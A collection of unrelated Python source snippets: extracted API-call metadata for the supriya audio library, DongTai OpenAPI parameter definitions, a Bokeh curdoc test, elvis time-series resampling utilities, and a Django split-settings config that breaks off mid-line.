"uqbar.objects.new",
"supriya.commands.BufferAllocateReadRequest"
] |
[((814, 848), 'dataclasses.dataclass', 'dataclasses.dataclass', ([], {'frozen': '(True)'}), '(frozen=True)\n', (835, 848), False, 'import dataclasses\n'), ((890, 924), 'dataclasses.dataclass', 'dataclasses.dataclass', ([], {'frozen': '(True)'}), '(frozen=True)\n', (911, 924), False, 'import dataclasses\n'), ((2539, 2573), 'dataclasses.dataclass', 'dataclasses.dataclass', ([], {'frozen': '(True)'}), '(frozen=True)\n', (2560, 2573), False, 'import dataclasses\n'), ((2732, 2766), 'dataclasses.dataclass', 'dataclasses.dataclass', ([], {'frozen': '(True)'}), '(frozen=True)\n', (2753, 2766), False, 'import dataclasses\n'), ((3446, 3480), 'dataclasses.dataclass', 'dataclasses.dataclass', ([], {'frozen': '(True)'}), '(frozen=True)\n', (3467, 3480), False, 'import dataclasses\n'), ((4769, 4803), 'dataclasses.dataclass', 'dataclasses.dataclass', ([], {'frozen': '(True)'}), '(frozen=True)\n', (4790, 4803), False, 'import dataclasses\n'), ((7180, 7214), 'dataclasses.dataclass', 'dataclasses.dataclass', ([], {'frozen': '(True)'}), '(frozen=True)\n', (7201, 7214), False, 'import dataclasses\n'), ((7786, 7820), 'dataclasses.dataclass', 'dataclasses.dataclass', ([], {'frozen': '(True)'}), '(frozen=True)\n', (7807, 7820), False, 'import dataclasses\n'), ((9536, 9570), 'dataclasses.dataclass', 'dataclasses.dataclass', ([], {'frozen': '(True)'}), '(frozen=True)\n', (9557, 9570), False, 'import dataclasses\n'), ((3688, 3717), 'dataclasses.field', 'dataclasses.field', ([], {'init': '(False)'}), '(init=False)\n', (3705, 3717), False, 'import dataclasses\n'), ((9686, 9725), 'dataclasses.field', 'dataclasses.field', ([], {'default_factory': 'list'}), '(default_factory=list)\n', (9703, 9725), False, 'import dataclasses\n'), ((9768, 9807), 'dataclasses.field', 'dataclasses.field', ([], {'default_factory': 'list'}), '(default_factory=list)\n', (9785, 9807), False, 'import dataclasses\n'), ((9849, 9888), 'dataclasses.field', 'dataclasses.field', ([], {'default_factory': 'list'}), '(default_factory=list)\n', (9866, 9888), False, 'import dataclasses\n'), ((9958, 9997), 'dataclasses.field', 'dataclasses.field', ([], {'default_factory': 'list'}), '(default_factory=list)\n', (9975, 9997), False, 'import dataclasses\n'), ((10079, 10118), 'dataclasses.field', 'dataclasses.field', ([], {'default_factory': 'list'}), '(default_factory=list)\n', (10096, 10118), False, 'import dataclasses\n'), ((10170, 10209), 'dataclasses.field', 'dataclasses.field', ([], {'default_factory': 'list'}), '(default_factory=list)\n', (10187, 10209), False, 'import dataclasses\n'), ((10308, 10347), 'dataclasses.field', 'dataclasses.field', ([], {'default_factory': 'list'}), '(default_factory=list)\n', (10325, 10347), False, 'import dataclasses\n'), ((10365, 10397), 'dataclasses.field', 'dataclasses.field', ([], {'default': '(False)'}), '(default=False)\n', (10382, 10397), False, 'import dataclasses\n'), ((10437, 10524), 'dataclasses.field', 'dataclasses.field', ([], {'init': '(False)', 'default_factory': 'contextlib.ExitStack', 'compare': '(False)'}), '(init=False, default_factory=contextlib.ExitStack, compare\n =False)\n', (10454, 10524), False, 'import dataclasses\n'), ((10589, 10611), 'contextlib.ExitStack', 'contextlib.ExitStack', ([], {}), '()\n', (10609, 10611), False, 'import contextlib\n'), ((17615, 17636), 'collections.Counter', 'collections.Counter', ([], {}), '()\n', (17634, 17636), False, 'import collections\n'), ((20713, 20722), 'supriya.nonrealtime.Session', 'Session', ([], {}), '()\n', (20720, 20722), False, 'from supriya.nonrealtime import Session\n'), ((21020, 21028), 'supriya.realtime.Server', 'Server', ([], {}), '()\n', (21026, 21028), False, 'from supriya.realtime import AsyncServer, BaseServer, Server\n'), ((21340, 21353), 'supriya.realtime.AsyncServer', 'AsyncServer', ([], {}), '()\n', (21351, 21353), False, 'from supriya.realtime import AsyncServer, BaseServer, Server\n'), ((21994, 22032), 'types.MappingProxyType', 'MappingProxyType', (['self._annotation_map'], {}), '(self._annotation_map)\n', (22010, 22032), False, 'from types import MappingProxyType\n'), ((24117, 24160), 'supriya.enums.CalculationRate.from_expr', 'CalculationRate.from_expr', (['calculation_rate'], {}), '(calculation_rate)\n', (24142, 24160), False, 'from supriya.enums import AddAction, CalculationRate, ParameterRate\n'), ((24747, 24790), 'supriya.enums.CalculationRate.from_expr', 'CalculationRate.from_expr', (['calculation_rate'], {}), '(calculation_rate)\n', (24772, 24790), False, 'from supriya.enums import AddAction, CalculationRate, ParameterRate\n'), ((30584, 30627), 'supriya.enums.CalculationRate.from_expr', 'CalculationRate.from_expr', (['calculation_rate'], {}), '(calculation_rate)\n', (30609, 30627), False, 'from supriya.enums import AddAction, CalculationRate, ParameterRate\n'), ((30813, 30878), 'supriya.realtime.Bus._get_allocator', 'realtime.Bus._get_allocator', (['calculation_rate'], {'server': 'self.server'}), '(calculation_rate, server=self.server)\n', (30840, 30878), False, 'from supriya import commands, nonrealtime, realtime\n'), ((31266, 31309), 'supriya.enums.CalculationRate.from_expr', 'CalculationRate.from_expr', (['calculation_rate'], {}), '(calculation_rate)\n', (31291, 31309), False, 'from supriya.enums import AddAction, CalculationRate, ParameterRate\n'), ((31606, 31671), 'supriya.realtime.Bus._get_allocator', 'realtime.Bus._get_allocator', (['calculation_rate'], {'server': 'self.server'}), '(calculation_rate, server=self.server)\n', (31633, 31671), False, 'from supriya import commands, nonrealtime, realtime\n'), ((33923, 33998), 'supriya.realtime.Bus._get_allocator', 'realtime.Bus._get_allocator', (['bus_proxy.calculation_rate'], {'server': 'self.server'}), '(bus_proxy.calculation_rate, server=self.server)\n', (33950, 33998), False, 'from supriya import commands, nonrealtime, realtime\n'), ((34238, 34324), 'supriya.realtime.Bus._get_allocator', 'realtime.Bus._get_allocator', (['bus_group_proxy.calculation_rate'], {'server': 'self.\n server'}), '(bus_group_proxy.calculation_rate, server=self.\n server)\n', (34265, 34324), False, 'from supriya import commands, nonrealtime, realtime\n'), ((2011, 2085), 'supriya.commands.BufferAllocateRequest', 'commands.BufferAllocateRequest', ([], {'channel_count': 'self.channel_count'}), '(**kwargs, channel_count=self.channel_count)\n', (2041, 2085), False, 'from supriya import commands, nonrealtime, realtime\n'), ((2258, 2302), 'supriya.commands.BufferAllocateReadRequest', 'commands.BufferAllocateReadRequest', ([], {}), '(**kwargs)\n', (2292, 2302), False, 'from supriya import commands, nonrealtime, realtime\n'), ((15302, 15363), 'supriya.commands.ControlBusSetRequest', 'commands.ControlBusSetRequest', ([], {'index_value_pairs': 'sorted_pairs'}), '(index_value_pairs=sorted_pairs)\n', (15331, 15363), False, 'from supriya import commands, nonrealtime, realtime\n'), ((17100, 17162), 'supriya.commands.RequestBundle', 'commands.RequestBundle', ([], {'timestamp': 'timestamp', 'contents': 'requests'}), '(timestamp=timestamp, contents=requests)\n', (17122, 17162), False, 'from supriya import commands, nonrealtime, realtime\n'), ((34044, 34075), 'typing.cast', 'cast', (['int', 'bus_proxy.identifier'], {}), '(int, bus_proxy.identifier)\n', (34048, 34075), False, 'from typing import Any, Callable, Dict, List, Mapping, Optional, Sequence, Tuple, Type, Union, cast\n'), ((34365, 34402), 'typing.cast', 'cast', (['int', 'bus_group_proxy.identifier'], {}), '(int, bus_group_proxy.identifier)\n', (34369, 34402), False, 'from typing import Any, Callable, Dict, List, Mapping, Optional, Sequence, Tuple, Type, Union, cast\n'), ((11776, 11812), 'uqbar.objects.new', 'new', (['synthdef_request'], {'callback': 'None'}), '(synthdef_request, callback=None)\n', (11779, 11812), False, 'from uqbar.objects import new\n'), ((12035, 12077), 'supriya.commands.RequestBundle.partition', 'commands.RequestBundle.partition', (['requests'], {}), '(requests)\n', (12067, 12077), False, 'from supriya import commands, nonrealtime, realtime\n'), ((12204, 12267), 'supriya.commands.RequestBundle.partition', 'commands.RequestBundle.partition', (['requests'], {'timestamp': 'timestamp'}), '(requests, timestamp=timestamp)\n', (12236, 12267), False, 'from supriya import commands, nonrealtime, realtime\n'), ((13317, 13380), 'supriya.commands.RequestBundle.partition', 'commands.RequestBundle.partition', (['requests'], {'timestamp': 'timestamp'}), '(requests, timestamp=timestamp)\n', (13349, 13380), False, 'from supriya import commands, nonrealtime, realtime\n'), ((27581, 27626), 'typing.cast', 'cast', (['nonrealtime.Node', 'node_proxy.identifier'], {}), '(nonrealtime.Node, node_proxy.identifier)\n', (27585, 27626), False, 'from typing import Any, Callable, Dict, List, Mapping, Optional, Sequence, Tuple, Type, Union, cast\n'), ((28274, 28317), 'typing.cast', 'cast', (['nonrealtime.Bus', 'bus_proxy.identifier'], {}), '(nonrealtime.Bus, bus_proxy.identifier)\n', (28278, 28317), False, 'from typing import Any, Callable, Dict, List, Mapping, Optional, Sequence, Tuple, Type, Union, cast\n'), ((28626, 28671), 'typing.cast', 'cast', (['nonrealtime.Node', 'node_proxy.identifier'], {}), '(nonrealtime.Node, node_proxy.identifier)\n', (28630, 28671), False, 'from typing import Any, Callable, Dict, List, Mapping, Optional, Sequence, Tuple, Type, Union, cast\n'), ((13169, 13205), 'uqbar.objects.new', 'new', (['synthdef_request'], {'callback': 'None'}), '(synthdef_request, callback=None)\n', (13172, 13205), False, 'from uqbar.objects import new\n'), ((16162, 16180), 'tempfile.mkdtemp', 'tempfile.mkdtemp', ([], {}), '()\n', (16178, 16180), False, 'import tempfile\n'), ((16426, 16462), 're.sub', 're.sub', (['"""[^\\\\w]"""', '"""-"""', 'synthdef.name'], {}), "('[^\\\\w]', '-', synthdef.name)\n", (16432, 16462), False, 'import re\n'), ((15867, 15908), 'supriya.commands.RequestBundle', 'commands.RequestBundle', ([], {'contents': 'requests'}), '(contents=requests)\n', (15889, 15908), False, 'from supriya import commands, nonrealtime, realtime\n'), ((16947, 16988), 'supriya.commands.RequestBundle', 'commands.RequestBundle', ([], {'contents': 'requests'}), '(contents=requests)\n', (16969, 16988), False, 'from supriya import commands, nonrealtime, realtime\n')]
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# author: <EMAIL>
# datetime: 2021/9/28 10:51 a.m.
# project: dongtai-openapi
from drf_spectacular.utils import OpenApiParameter, OpenApiExample
class DongTaiAuth:
TOKEN = 'TokenAuthentication'
class DongTaiParameter:
OPENAPI_URL = OpenApiParameter(
name='url',
description='OpenAPI Service Addr',
required=True,
type=str,
examples=[
OpenApiExample(
'url example',
summary='default',
value='https://openapi.iast.io',
),
],
)
PROJECT_NAME = OpenApiParameter(
name='projectName',
type=str,
description='The name of the project where the Agent needs to be installed',
examples=[
OpenApiExample(
'example with https://iast.io',
summary='default',
value='Demo Project',
),
],
)
LANGUAGE = OpenApiParameter(
name='language',
type=str,
description='The development language of the project that needs to install the Agent',
required=True,
examples=[
OpenApiExample(
'example language',
summary='JAVA or PYTHON',
value='JAVA',
),
],
)
VERSION = OpenApiParameter(
name='version',
type=str,
        description='The version of the Agent to be installed',
required=True,
examples=[
OpenApiExample(
'example language',
summary='java or python',
value='java',
),
],
)
AGENT_NAME = OpenApiParameter(
name='name',
type=str,
        description='The name of the Agent to be installed',
required=True,
examples=[
OpenApiExample(
'example language',
summary='java or python',
value='java',
),
],
)
HOSTNAME = OpenApiParameter(
name='engineName',
type=str,
        description='The hostname of the server where the Agent runs',
required=True,
examples=[
OpenApiExample(
'example language',
summary='java or python',
value='java',
),
],
)
NETWORK = OpenApiParameter(
name='engineName',
type=str,
        description='The network information of the server where the Agent runs',
required=True,
examples=[
OpenApiExample(
'example language',
summary='java or python',
value='java',
),
],
)
CONTAINER_NAME = OpenApiParameter(
name='containerName',
type=str,
        description='The name of the container in which the Agent runs',
required=True,
examples=[
OpenApiExample(
'example language',
summary='java or python',
value='java',
),
],
)
CONTAINER_VERSION = OpenApiParameter(
name='containerVersion',
type=str,
        description='The version of the container in which the Agent runs',
required=True,
examples=[
OpenApiExample(
'example language',
summary='java or python',
value='java',
),
],
)
SERVER_ADDR = OpenApiParameter(
name='serverAddr',
type=str,
        description='The address of the server where the Agent is installed',
required=True,
examples=[
OpenApiExample(
'example language',
summary='java or python',
value='java',
),
],
)
SERVER_PORT = OpenApiParameter(
name='serverPort',
type=str,
        description='The port of the server where the Agent is installed',
required=True,
examples=[
OpenApiExample(
'example language',
summary='java or python',
value='java',
),
],
)
SERVER_PATH = OpenApiParameter(
name='serverPath',
type=str,
        description='The path of the server where the Agent is installed',
required=True,
examples=[
OpenApiExample(
'example language',
summary='java or python',
value='java',
),
],
)
SERVER_ENV = OpenApiParameter(
name='serverEnv',
type=str,
        description='The environment of the server where the Agent is installed',
required=True,
examples=[
OpenApiExample(
'example language',
summary='java or python',
value='java',
),
],
)
PID = OpenApiParameter(
name='pid',
type=str,
        description='The process ID of the service running the Agent',
required=True,
examples=[
OpenApiExample(
'example language',
summary='java or python',
value='java',
),
],
)
AUTO_CREATE_PROJECT = OpenApiParameter(
name='autoCreateProject',
type=int,
description=
'auto create project if project not found when this varibale is 1',
required=True,
examples=[
OpenApiExample(
'default value',
value=0,
),
OpenApiExample(
'enable value',
value=1,
),
],
)
ENGINE_NAME = OpenApiParameter(
name='engineName',
type=str,
        description='The name of the engine running the Agent',
required=True,
examples=[
OpenApiExample(
'example language',
summary='java or python',
value='java',
),
],
)
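    # Hedged usage sketch (added for illustration; the view method below is
    # hypothetical, not part of dongtai-openapi). Parameters defined above are
    # meant to be attached to a DRF view via drf-spectacular's extend_schema:
    #
    #     from drf_spectacular.utils import extend_schema
    #
    #     @extend_schema(parameters=[DongTaiParameter.OPENAPI_URL,
    #                                DongTaiParameter.PROJECT_NAME,
    #                                DongTaiParameter.LANGUAGE])
    #     def get(self, request):
    #         ...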
|
[
"drf_spectacular.utils.OpenApiExample"
] |
[((440, 526), 'drf_spectacular.utils.OpenApiExample', 'OpenApiExample', (['"""url example"""'], {'summary': '"""default"""', 'value': '"""https://openapi.iast.io"""'}), "('url example', summary='default', value=\n 'https://openapi.iast.io')\n", (454, 526), False, 'from drf_spectacular.utils import OpenApiParameter, OpenApiExample\n'), ((802, 894), 'drf_spectacular.utils.OpenApiExample', 'OpenApiExample', (['"""example with https://iast.io"""'], {'summary': '"""default"""', 'value': '"""Demo Project"""'}), "('example with https://iast.io', summary='default', value=\n 'Demo Project')\n", (816, 894), False, 'from drf_spectacular.utils import OpenApiParameter, OpenApiExample\n'), ((1197, 1271), 'drf_spectacular.utils.OpenApiExample', 'OpenApiExample', (['"""example language"""'], {'summary': '"""JAVA or PYTHON"""', 'value': '"""JAVA"""'}), "('example language', summary='JAVA or PYTHON', value='JAVA')\n", (1211, 1271), False, 'from drf_spectacular.utils import OpenApiParameter, OpenApiExample\n'), ((1577, 1651), 'drf_spectacular.utils.OpenApiExample', 'OpenApiExample', (['"""example language"""'], {'summary': '"""java or python"""', 'value': '"""java"""'}), "('example language', summary='java or python', value='java')\n", (1591, 1651), False, 'from drf_spectacular.utils import OpenApiParameter, OpenApiExample\n'), ((1957, 2031), 'drf_spectacular.utils.OpenApiExample', 'OpenApiExample', (['"""example language"""'], {'summary': '"""java or python"""', 'value': '"""java"""'}), "('example language', summary='java or python', value='java')\n", (1971, 2031), False, 'from drf_spectacular.utils import OpenApiParameter, OpenApiExample\n'), ((2341, 2415), 'drf_spectacular.utils.OpenApiExample', 'OpenApiExample', (['"""example language"""'], {'summary': '"""java or python"""', 'value': '"""java"""'}), "('example language', summary='java or python', value='java')\n", (2355, 2415), False, 'from drf_spectacular.utils import OpenApiParameter, OpenApiExample\n'), ((2724, 2798), 'drf_spectacular.utils.OpenApiExample', 'OpenApiExample', (['"""example language"""'], {'summary': '"""java or python"""', 'value': '"""java"""'}), "('example language', summary='java or python', value='java')\n", (2738, 2798), False, 'from drf_spectacular.utils import OpenApiParameter, OpenApiExample\n'), ((3117, 3191), 'drf_spectacular.utils.OpenApiExample', 'OpenApiExample', (['"""example language"""'], {'summary': '"""java or python"""', 'value': '"""java"""'}), "('example language', summary='java or python', value='java')\n", (3131, 3191), False, 'from drf_spectacular.utils import OpenApiParameter, OpenApiExample\n'), ((3516, 3590), 'drf_spectacular.utils.OpenApiExample', 'OpenApiExample', (['"""example language"""'], {'summary': '"""java or python"""', 'value': '"""java"""'}), "('example language', summary='java or python', value='java')\n", (3530, 3590), False, 'from drf_spectacular.utils import OpenApiParameter, OpenApiExample\n'), ((3903, 3977), 'drf_spectacular.utils.OpenApiExample', 'OpenApiExample', (['"""example language"""'], {'summary': '"""java or python"""', 'value': '"""java"""'}), "('example language', summary='java or python', value='java')\n", (3917, 3977), False, 'from drf_spectacular.utils import OpenApiParameter, OpenApiExample\n'), ((4290, 4364), 'drf_spectacular.utils.OpenApiExample', 'OpenApiExample', (['"""example language"""'], {'summary': '"""java or python"""', 'value': '"""java"""'}), "('example language', summary='java or python', value='java')\n", (4304, 4364), False, 'from drf_spectacular.utils import 
OpenApiParameter, OpenApiExample\n'), ((4677, 4751), 'drf_spectacular.utils.OpenApiExample', 'OpenApiExample', (['"""example language"""'], {'summary': '"""java or python"""', 'value': '"""java"""'}), "('example language', summary='java or python', value='java')\n", (4691, 4751), False, 'from drf_spectacular.utils import OpenApiParameter, OpenApiExample\n'), ((5062, 5136), 'drf_spectacular.utils.OpenApiExample', 'OpenApiExample', (['"""example language"""'], {'summary': '"""java or python"""', 'value': '"""java"""'}), "('example language', summary='java or python', value='java')\n", (5076, 5136), False, 'from drf_spectacular.utils import OpenApiParameter, OpenApiExample\n'), ((5443, 5517), 'drf_spectacular.utils.OpenApiExample', 'OpenApiExample', (['"""example language"""'], {'summary': '"""java or python"""', 'value': '"""java"""'}), "('example language', summary='java or python', value='java')\n", (5457, 5517), False, 'from drf_spectacular.utils import OpenApiParameter, OpenApiExample\n'), ((5847, 5887), 'drf_spectacular.utils.OpenApiExample', 'OpenApiExample', (['"""default value"""'], {'value': '(0)'}), "('default value', value=0)\n", (5861, 5887), False, 'from drf_spectacular.utils import OpenApiParameter, OpenApiExample\n'), ((5948, 5987), 'drf_spectacular.utils.OpenApiExample', 'OpenApiExample', (['"""enable value"""'], {'value': '(1)'}), "('enable value', value=1)\n", (5962, 5987), False, 'from drf_spectacular.utils import OpenApiParameter, OpenApiExample\n'), ((6283, 6357), 'drf_spectacular.utils.OpenApiExample', 'OpenApiExample', (['"""example language"""'], {'summary': '"""java or python"""', 'value': '"""java"""'}), "('example language', summary='java or python', value='java')\n", (6297, 6357), False, 'from drf_spectacular.utils import OpenApiParameter, OpenApiExample\n')]
|
#-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2017, Anaconda, Inc. All rights reserved.
#
# Powered by the Bokeh Development Team.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Boilerplate
#-----------------------------------------------------------------------------
from __future__ import absolute_import, division, print_function, unicode_literals
import pytest ; pytest
from bokeh.util.api import DEV, GENERAL ; DEV, GENERAL
from bokeh.util.testing import verify_api ; verify_api
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Standard library imports
# External imports
# Bokeh imports
from bokeh.document import Document
from bokeh.io.state import curstate
# Module under test
import bokeh.io.doc as bid
#-----------------------------------------------------------------------------
# API Definition
#-----------------------------------------------------------------------------
api = {
GENERAL: (
( 'curdoc', (1, 0, 0) ),
), DEV: (
( 'set_curdoc', (1, 0, 0) ),
)
}
Test_api = verify_api(bid, api)
#-----------------------------------------------------------------------------
# Setup
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# General API
#-----------------------------------------------------------------------------
def test_curdoc_from_curstate():
assert bid.curdoc() is curstate().document
#-----------------------------------------------------------------------------
# Dev API
#-----------------------------------------------------------------------------
def test_set_curdoc_sets_curstate():
d = Document()
bid.set_curdoc(d)
assert curstate().document is d
#-----------------------------------------------------------------------------
# Private API
#-----------------------------------------------------------------------------
|
[
"bokeh.io.doc.curdoc",
"bokeh.document.Document",
"bokeh.util.testing.verify_api",
"bokeh.io.state.curstate",
"bokeh.io.doc.set_curdoc"
] |
[((1401, 1421), 'bokeh.util.testing.verify_api', 'verify_api', (['bid', 'api'], {}), '(bid, api)\n', (1411, 1421), False, 'from bokeh.util.testing import verify_api\n'), ((2058, 2068), 'bokeh.document.Document', 'Document', ([], {}), '()\n', (2066, 2068), False, 'from bokeh.document import Document\n'), ((2073, 2090), 'bokeh.io.doc.set_curdoc', 'bid.set_curdoc', (['d'], {}), '(d)\n', (2087, 2090), True, 'import bokeh.io.doc as bid\n'), ((1807, 1819), 'bokeh.io.doc.curdoc', 'bid.curdoc', ([], {}), '()\n', (1817, 1819), True, 'import bokeh.io.doc as bid\n'), ((1823, 1833), 'bokeh.io.state.curstate', 'curstate', ([], {}), '()\n', (1831, 1833), False, 'from bokeh.io.state import curstate\n'), ((2102, 2112), 'bokeh.io.state.curstate', 'curstate', ([], {}), '()\n', (2110, 2112), False, 'from bokeh.io.state import curstate\n')]
|
"""Methods that are elvis related and used in multiple times inside elvis."""
import datetime
import math
import pandas as pd
from elvis.distribution import EquallySpacedInterpolatedDistribution
def create_time_steps(start_date, end_date, resolution):
"""Create list from start, end date and resolution of the simulation period with all individual
time steps.
Args:
start_date: (:obj: `datetime.datetime`): First time stamp.
end_date: (:obj: `datetime.datetime`): Upper bound for time stamps.
resolution: (:obj: `datetime.timedelta`): Time in between two adjacent time stamps.
Returns:
time_steps: (list): Contains time_steps in `datetime.datetime` format
"""
# Create list containing all time steps as datetime.datetime object
time_step = start_date
time_steps = []
while time_step <= end_date:
time_steps.append(time_step)
time_step += resolution
return time_steps
def num_time_steps(start_date, end_date, resolution):
"""Returns the number of time steps given a period described by its start and end date
and the resolution.
Args:
start_date: (:obj: `datetime.datetime`): First time stamp.
end_date: (:obj: `datetime.datetime`): Upper bound for time stamps.
resolution: (:obj: `datetime.timedelta`): Time in between two adjacent time stamps.
Returns:
num_time_steps: (int): Number of time steps to be simulated.
"""
return int((end_date - start_date) / resolution) + 1
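# Illustrative sanity check (added for this write-up, not part of the original
# module): one day in hourly resolution yields 25 time stamps, bounds inclusive,
# and both helpers above agree on that count.
def _demo_time_steps():
    start = datetime.datetime(2020, 1, 1)
    end = datetime.datetime(2020, 1, 2)
    resolution = datetime.timedelta(hours=1)
    steps = create_time_steps(start, end, resolution)
    assert len(steps) == num_time_steps(start, end, resolution) == 25
    return steps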
def transform_data(input_df, resolution, start_date, end_date):
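    """Resample the input data onto the simulation period.

    Missing values are linearly interpolated, the series is normalised to minute
    resolution, values are averaged per (weekday, month, minute-of-day), and days
    without data are filled from the closest available (weekday, month) pair.
    """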
    assert len(input_df) >= 2, "must provide at least two datapoints"
assert resolution.seconds >= 60, "resolutions lower than one minute not supported"
# convert to a list of dates and corresponding values
if isinstance(input_df, pd.DataFrame):
input_data = []
        for idx, value in input_df.items():
input_data.append((idx, value))
else:
assert isinstance(input_df, list), "input must be list or pandas.DataFrame"
input_data = input_df
# get resolution and time frame of input data
input_start_date = input_data[0][0]
input_resolution = input_data[1][0] - input_start_date
input_resolution_seconds = input_resolution.seconds
# linearly interpolate missing values in input data
interp_input_data = [input_data[0], input_data[1]]
for i in range(2, len(input_data)):
prev = input_data[i - 1]
curr = input_data[i]
dist = curr[0] - prev[0]
# distance between data points is equal to resolution
if dist == input_resolution:
interp_input_data.append(curr)
continue
# check if distance is evenly divisible by resolution
rem = dist.seconds % input_resolution_seconds
if rem != 0:
raise Exception("inconsistent distance between data points")
steps = math.floor(dist.seconds / input_resolution_seconds)
if steps > 0:
step = (curr[1] - prev[1]) / steps
for j in range(1, steps):
interp_input_data.append((prev[0] + (j * input_resolution), prev[1] + (j * step)))
interp_input_data.append(curr)
# transform input data to minute resolution
input_data_minute_res = []
if input_resolution_seconds > 60:
# interpolate datapoints to get minute resolution
interp_steps = math.floor(input_resolution_seconds / 60)
minute_res = datetime.timedelta(seconds=60)
for j in range(1, len(interp_input_data)):
prev = interp_input_data[j - 1][1]
curr = interp_input_data[j][1]
step = (curr - prev) / interp_steps
input_data_minute_res.append(interp_input_data[j - 1])
for k in range(1, interp_steps):
input_data_minute_res.append(
(interp_input_data[j - 1][0] + (k * minute_res), prev + (k * step)))
elif input_resolution_seconds < 60:
# take the average of datapoints within a minute
curr_sum = interp_input_data[0][1]
curr_cnt = 1
curr_date = input_start_date
curr_start_date = curr_date
for j in range(1, len(interp_input_data)):
next_date = interp_input_data[j][0]
# check if we're at the next minute
if next_date.minute != curr_date.minute:
input_data_minute_res.append((curr_start_date, curr_sum / curr_cnt))
curr_sum = 0
curr_cnt = 0
curr_start_date = next_date
curr_sum += interp_input_data[j][1]
curr_cnt += 1
curr_date = next_date
if curr_sum > 0:
input_data_minute_res.append((curr_start_date, curr_sum / curr_cnt))
else:
input_data_minute_res = interp_input_data
# now calculate averages for every unique (weekday, month) pair that we have available
available_datapoints = dict()
for date, value in input_data_minute_res:
weekday = date.weekday()
month = date.month
key = (weekday, month)
if key not in available_datapoints:
available_datapoints[key] = (
[0 for _ in range(0, 24 * 60)], [0 for _ in range(0, 24 * 60)])
minute_of_day = date.hour * 60 + date.minute
available_datapoints[key][0][minute_of_day] += value
available_datapoints[key][1][minute_of_day] += 1
for value in available_datapoints.values():
for j in range(0, len(value[0])):
if value[1][j] <= 1:
continue
value[0][j] /= value[1][j]
# uncomment to export data for all (weekday, month) pairs
# for key, value in available_datapoints.items():
# export_csv(value[0], "./input_data_averaged/" + str(key[0]) + "_" + str(key[1]) + ".csv")
# build the result by finding the closest (weekday, month) pair for every required day
result_data = []
curr_date = start_date
curr_day_data = None
prev_weekday = None
while curr_date < end_date:
curr_weekday = curr_date.weekday()
if prev_weekday is None or curr_weekday != prev_weekday:
curr_month = curr_date.month
prev_weekday = curr_weekday
if (curr_weekday, curr_month) in available_datapoints:
# use the available data for the day
curr_day_data = available_datapoints[(curr_weekday, curr_month)]
else:
# find the closest available data point
min_dist = math.inf
for key, value in available_datapoints.items():
dist = abs(key[0] - curr_weekday) + abs(key[1] - curr_month)
if dist >= min_dist:
continue
min_dist = dist
curr_day_data = value
minute_of_day = curr_date.hour * 60 + curr_date.minute
result_data.append((curr_date, curr_day_data[0][minute_of_day]))
curr_date += resolution
return result_data
def adjust_resolution(preload, res_data, res_simulation):
"""Adjusts res_data of the transformer preload to the simulation res_data.
Args:
preload: (list): Containing the transformer preload in "wrong"
res_data.
res_data: (datetime.timedelta): Time in between two adjacent data points of
transformer preload with "wrong" res_data.
res_simulation: (datetime.timedelta): Time in between two adjacent time steps in
the simulation.
Returns:
transformer_preload_new_res: (list): Transformer preload with linearly interpolated data
points having the res_data of the simulation.
"""
x_values = list(range(len(preload)))
distribution = EquallySpacedInterpolatedDistribution.linear(
list(zip(x_values, preload)), None)
coefficient = res_simulation / res_data
x_values_new_res = list(range(math.ceil(len(preload) * 1 / coefficient)))
x_values_new_res = [x * coefficient for x in x_values_new_res]
transformer_preload_new_res = []
for x in x_values_new_res:
transformer_preload_new_res.append(distribution[x])
return transformer_preload_new_res
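# Illustrative sketch (added for this write-up; relies on the elvis distribution
# class imported above): halving the data resolution from 15 to 30 minutes keeps
# every second, linearly interpolated, data point.
def _demo_adjust_resolution():
    preload = [10.0, 20.0, 30.0, 40.0]
    res_data = datetime.timedelta(minutes=15)
    res_simulation = datetime.timedelta(minutes=30)
    return adjust_resolution(preload, res_data, res_simulation)  # [10.0, 30.0]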
def repeat_data(preload, num_simulation_steps):
"""Repeats the transformer preload data until there are as many values as there are
simulation steps.
Args:
preload: (list): Containing the data (floats) to be repeated.
num_simulation_steps: (int): Number of simulation steps and expected length of
the transformer preload after it is repeated.
Returns:
transformer_preload_repeated: (list): Repeated values. len() = num_simulation_steps.
"""
n = math.floor(num_simulation_steps / len(preload))
transformer_preload_repeated = preload * n
values_to_add = num_simulation_steps - len(transformer_preload_repeated)
transformer_preload_repeated += preload[:values_to_add]
return transformer_preload_repeated
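# Illustrative sketch (added for this write-up): a 3-value profile filling 7
# simulation steps wraps around and is truncated at the end.
def _demo_repeat_data():
    assert repeat_data([1, 2, 3], 7) == [1, 2, 3, 1, 2, 3, 1]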
def floor(value, decimals=3):
"""Floors a value to 3 decimals."""
assert isinstance(decimals, int), 'Decimals must be of type int'
coeff = 10**decimals
value = math.floor(value * coeff) / coeff
return value
|
[
"math.floor",
"datetime.timedelta"
] |
[((2940, 2991), 'math.floor', 'math.floor', (['(dist.seconds / input_resolution_seconds)'], {}), '(dist.seconds / input_resolution_seconds)\n', (2950, 2991), False, 'import math\n'), ((3439, 3480), 'math.floor', 'math.floor', (['(input_resolution_seconds / 60)'], {}), '(input_resolution_seconds / 60)\n', (3449, 3480), False, 'import math\n'), ((3502, 3532), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': '(60)'}), '(seconds=60)\n', (3520, 3532), False, 'import datetime\n'), ((9255, 9280), 'math.floor', 'math.floor', (['(value * coeff)'], {}), '(value * coeff)\n', (9265, 9280), False, 'import math\n')]
|
"""
This is a django-split-settings main file.
For more information read this:
https://github.com/sobolevn/django-split-settings
Close copy of https://medium.com/wemake-services/managing-djangos-settings-e2b7f496120d
Default environment is `development`.
To change settings file: `DJANGO_ENV=production python manage.py runserver`
"""
from os import environ
from split_settings.tools import include, optional
from myAzure.az_connect import AzureConnection
azCon = AzureConnection()
azCon.main()
base_settings = [
# Select the right env:
"environments/%s.py" % azCon.env,
# standard django settings
"components/common.py",
# Optionally override some settings:
# optional('environments/local.py'),
]
include(*base_settings)
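# Hedged note (illustration only): if the environment choice came from DJANGO_ENV
# as the docstring above describes, instead of from AzureConnection, the selection
# could look like this, using the `environ` and `optional` imports above:
#
#     ENV = environ.get('DJANGO_ENV', 'development')
#     base_settings = [
#         "environments/%s.py" % ENV,
#         "components/common.py",
#         optional('environments/local.py'),
#     ]
#     include(*base_settings)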
|
[
"split_settings.tools.include",
